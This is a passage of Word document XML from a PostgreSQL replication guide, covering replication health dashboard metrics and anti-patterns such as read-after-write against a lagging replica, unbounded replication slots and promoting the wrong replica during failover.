      <w:r w:rsidRPr="00A12791">
        <w:t>-- Action: investigate consumer, drop slot if consumer won't recover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C849B3E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>DROP_REPLICATION_SLOT('stale_slot_name');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5644540B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- (replica for this slot will need full resync)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1658FE85" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replication Health Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F28E398" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB02FAA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Essential dashboard panels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18214089" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="4EB58EF3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>1. Replication Lag (per replica, time series)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2639EF8C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Metric: replica_lag_seconds per replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A79D96" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Alert: &gt; 30s warning, &gt; 300s critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14554129" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B1882E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>2. WAL Generation Rate (primary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C20EBA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Metric: pg_current_wal_lsn() derivative (bytes/sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBBAA04" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Correlation: spike in WAL rate → lag increase expected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2376615A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8183F4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>3. Replication Slot Sizes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AFDB57" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Metric: replication slot lag bytes per slot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537E7F2E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Alert: &gt; 10GB (primary disk risk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E1FB2D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166DC3AB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>4. Replica Apply Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF83431" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Metric: pg_last_wal_replay_lsn() derivative on each replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF6F0B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   If &lt; WAL generation rate: replica falling behind (apply bottleneck)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7CE602" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6190B28A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>5. Synchronous Commit Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071E53D8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   Metric: transaction commit time when synchronous replication enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318334AD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   p50, p95, p99 commit latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118894F6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Correlated with replica network latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC7591D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB28CC4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>6. Failover Readiness Score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CF363D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Composite metric:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19607F61" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     Most up-to-date replica lag (seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26036F14" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     Synchronous replica count (online/configured)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC906A3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     Replication slot health (all slots &lt; lag threshold)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77109A24" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Score: 0-100%, alert if &lt; 80%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F64BE4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="069FE465">
          <v:rect id="_x0000_i5518" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCA4A8F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Replication Anti-Patterns — What Goes Wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649B3CE5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 1: Replication Lag Ignored in Application Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327BFB14" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595BF898" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t># Wrong: write to primary, immediately read from replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385CC040" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>def update_user_email(user_id, new_email):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594839B4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    primary.execute("UPDATE users SET email = %s WHERE id = %s", new_email, user_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DAA228" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588BA45C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    # This read goes to replica (load balancer routes reads there)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002D305F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    user = replica.execute("SELECT email FROM users WHERE id = %s", user_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A562E8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D0598A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    # user.email may still be the OLD email (replication lag!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B07E3A4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    send_confirmation_email(user.email)  # sends to wrong address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B4E29E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7E66B1A5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t># Correct: read from primary for read-after-write scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B9F682" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>def update_user_email(user_id, new_email):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D32C4E6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    primary.execute("UPDATE users SET email = %s WHERE id = %s", new_email, user_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB88612" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FC2433" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    # Read from primary (or wait for replica to catch up)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48059331" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    user = primary.execute("SELECT email FROM users WHERE id = %s", user_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EC9067" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    send_confirmation_email(user.email)  # correct email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466C6B7A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 2: Unchecked Replication Slots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4863F9AB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6DE080" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Scenario: CDC consumer (Debezium) configured with a replication slot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184A5E00" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Consumer goes offline for maintenance → 3 days of WAL accumulates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7804F51F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>WAL retention: unlimited (slot prevents deletion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713C9F45" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Primary disk: fills up completely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB70165" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>PostgreSQL: unable to write WAL → all writes fail → complete outage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BD45C0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="6829AA38" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Prevention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21740D86" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  max_slot_wal_keep_size (PostgreSQL 13+):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3785B9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Sets maximum WAL size a replication slot can cause to be retained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79120550" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    If slot lag exceeds this limit: slot is invalidated (not deleted, but unusable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4362B8B0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Consumer must re-sync from scratch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D53FDB2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Prevents unbounded disk growth at cost of forced consumer re-sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A38739F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B8926C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Alert on slot lag &gt; N GB (before hitting limit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD61625" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Operational runbook: if consumer offline &gt; X hours → drop slot proactively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591C6C45" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3272834F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  SET max_slot_wal_keep_size = '50GB';  -- limit WAL retained per slot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E244B48" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 3: Promoting the Wrong Replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01690458" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D848C2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Scenario: Primary fails. Two replicas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686C1B6F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replica A: lag = 0 bytes (synchronous replica, fully caught up)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16655851" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replica B: lag = 50MB (asynchronous, slightly behind)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F9D545" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33779A99" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Operator promotes Replica B (it's in the preferred datacenter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E72B3F4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Replica A was more up-to-date but was not promoted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616E5F58" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="624CACA7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32885BE9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Transactions that Replica A had (but Replica B didn't) are now "lost"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343AB9EF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  If Replica A was synchronous: these were acknowledged to clients → data loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFBD9D2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E01885" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Prevention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1967E2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Automated failover tools (Patroni): always promote the most up-to-date replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B2FA1A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  pg_rewind: if wrong replica promoted, pg_rewind can fix it (if timeline not diverged too far)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3531AFB5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2E7AAF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Patroni leader election algorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682573CC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Each candidate publishes its current LSN to DCS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD84C58" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Highest LSN wins election → always the most up-to-date replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F5DA1C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 4: Synchronous Replication to Remote Replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBD2DAE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8E26F4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Scenario: synchronous_standby_names = 'replica_us_west'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51794810" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
